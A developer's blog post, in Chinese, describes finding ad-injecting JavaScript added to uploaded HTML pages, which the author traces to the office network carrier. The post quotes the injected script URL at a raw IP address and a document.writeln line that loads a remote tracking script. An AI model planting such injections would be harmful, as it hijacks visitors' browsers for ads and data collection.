专栏首页我是做APP开发的HTML被恶意注入JS弹广告

HTML被恶意注入JS弹广告

自己写个的网页上传到阿里云服务器供APP访问,突然发现在手机访问该页面时间歇性的弹出广告。你说膈应人不??

然后再用浏览器访问,查看源码发现在<head> 中多了一行这个东西

http://45.126.123.80:118/j.js?MAC=8CAB8EBA6EB8

点击进去

 document.writeln("<script src=\'http://45.126.123.80:118/t.php\'>
</script>");

继续查看http://45.126.123.80:118/t.php 一堆代码,获取各种信息。。。

瞬间心里很不爽,自己的页面就这样被人插了。

开始怀疑

  • 买的阿里云服务器被黑了
  • 文件上传软件有漏洞被人恶意篡改了

一番尝试之后

以上两点都不是,是由于上传文件时被运营商拦截了,然后注入上面js代码。

1、我换用手机4G网络连接,新建HTML文件上传,浏览,查看源码,一切正常。

2、我换用同事360WiFi热点后,重复1操作,一切正常。

3、我再次连接公司网络,重复1操作,还是出现恶心的js注入。

所以,我不得不把我的所有html页面重新上传覆盖了一遍。。。问题貌似解决了。

总结

网络运营商搞得鬼,拦截你的请求、插入你的代码、然后给你弹出广告、然后自己获利赚钱,整个一套不要脸的流程。

解决途径:

  • 像我一样替换网络重新上传覆盖原有被插的文件
  • 打电话给运营商,骂他,骂到不在插你为止
  • 使用https

以此记录,大家也要留意了。

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Flutter—开始与环境搭建

    进入flutter sdk 目录,然后找到bin/cache/lockfile文件,删除,然后在重新建, ok!

    Light413
  • TP5自动生成目录报错-模块不存在:index

    业余学习PHP好大一段时间了,初次接触这个框架,很多资料都是3.x的,特别目录文件也是傻瓜式生成。作为新一代的TP5.0之后好像之前的方式不能用了,可以自定义生...

    Light413
  • TP5视图和模板

    其中{,}是在配置文件中模板的标签标记,模板引擎解析定义好的标记,在按照约定的操作来解析模板中的代码为PHP代码,最后转为php文件输出。这下理解了吧,模板引擎...

    Light413
  • 树状数组模块(个人模板)

    owent
  • Socket hang up 是什么?什么情况下会发生?

    关于 Socket hang up 最早是在一次服务压测中出现的,后来得到了解决,近期在 Node.js 服务迁移 K8S 容器中时又报出了此问题,核查原因之后...

    五月君
  • 通过shell脚本快速定位active session问题(r4笔记第65天)

    如果你得到反馈,数据库突然间性能下降了好多,希望你能够尽快的定位出问题来,有一些思路和方法可以参考。分别从数据库层面,系统层面来定位,但是个人感觉而言还是不够快...

    jeanron100
  • [Leetcode][python]Median of Two Sorted Arrays/两个排序数组的中位数

    https://www.cnblogs.com/TenosDoIt/p/3554479.html

    后端技术漫谈
  • Kasan - Linux 内核的内存检测工具

    https://www.ibm.com/developerworks/cn/linux/1608_tengr_kasan/index.html

    Linux阅码场
  • POJ PKU 2155 Matrix 解题报告

    题目链接:http://acm.pku.edu.cn/JudgeOnline/problem?id=2155

    owent
  • http超时设置 golang

    golang提供的http get、post请求是没有设置超时的,但实现生产环境一般都需要设置超时时间。 网上搜索,可以查询到通过设置http.Client中T...

    李海彬

扫码关注云+社区

领取腾讯云代金券